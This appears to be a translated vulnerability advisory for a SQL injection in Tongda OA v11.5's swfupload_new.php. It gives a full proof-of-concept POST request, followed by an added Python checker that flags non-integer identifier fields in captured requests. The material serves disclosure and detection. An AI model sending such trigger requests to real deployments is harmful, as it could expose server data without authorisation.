Tongda OA v11.5 swfupload_new.php SQL injection vulnerability
Vulnerability Description
The swfupload_new.php file in Tongda OA v11.5 has a SQL injection vulnerability. An attacker can use it to obtain sensitive information from the server.
Vulnerability Impact
Tongda OA v11.5
Network surveying and mapping
Vulnerability reproduction
Login page
Sending the following request packet triggers the vulnerability:
POST /general/file_folder/swfupload_new.php HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 355
Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2
Accept-Encoding: gzip

------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_ID"

1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_NAME"

1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="FILE_SORT"

2
------------GFioQpMK0vv2
Content-Disposition: form-data; name="SORT_ID"

------------GFioQpMK0vv2--
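A defensive check for requests shaped like the one above, added here as an example and not part of the original post or of Tongda OA: it parses a captured multipart body sent to swfupload_new.php and reports identifier fields whose value is not a plain integer. Treating ATTACHMENT_ID, FILE_SORT and SORT_ID as numeric-only is an assumption, and build_body and the sample values are constructed for the demonstration.

```python
import re
from email import message_from_bytes
from email.policy import HTTP

ENDPOINT = "/general/file_folder/swfupload_new.php"  # path from the request above
BOUNDARY = "----------GFioQpMK0vv2"                  # boundary from the request above
# Assumption: these fields are numeric identifiers and should only hold digits.
INT_FIELDS = ("ATTACHMENT_ID", "FILE_SORT", "SORT_ID")
INT_RE = re.compile(r"\d{1,10}")


def parse_fields(content_type, body):
    """Decode a multipart/form-data body into {field name: text value}."""
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    msg = message_from_bytes(raw, policy=HTTP)
    fields = {}
    if not msg.is_multipart():
        return fields
    for part in msg.iter_parts():
        disposition = part["Content-Disposition"]
        name = disposition.params.get("name") if disposition else None
        if name:
            value = part.get_payload(decode=True) or b""
            fields[name] = value.decode("utf-8", "replace").strip()
    return fields


def review(method, path, content_type, body):
    """Return (field, value) pairs that are non-empty and not plain integers."""
    if method.upper() != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return []
    fields = parse_fields(content_type, body)
    return [(k, fields[k]) for k in INT_FIELDS
            if fields.get(k) and not INT_RE.fullmatch(fields[k])]


def build_body(fields):
    """Build a constructed multipart body for the samples below."""
    parts = [f'--{BOUNDARY}\r\nContent-Disposition: form-data; name="{k}"\r\n\r\n{v}\r\n'
             for k, v in fields.items()]
    return ("".join(parts) + f"--{BOUNDARY}--\r\n").encode()


if __name__ == "__main__":
    ctype = f"multipart/form-data; boundary={BOUNDARY}"
    ok = build_body({"ATTACHMENT_ID": "1", "ATTACHMENT_NAME": "1", "FILE_SORT": "2", "SORT_ID": ""})
    odd = build_body({"ATTACHMENT_ID": "1", "FILE_SORT": "2", "SORT_ID": "12abc"})  # constructed
    print(review("POST", ENDPOINT, ctype, ok))
    print(review("POST", ENDPOINT, ctype, odd))
```

The same validation belongs in front of the application (reverse proxy or WAF rule) as well as in log review, since a flagged request has already reached the server by the time it is logged.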
This post is licensed under CC BY 4.0 by the author.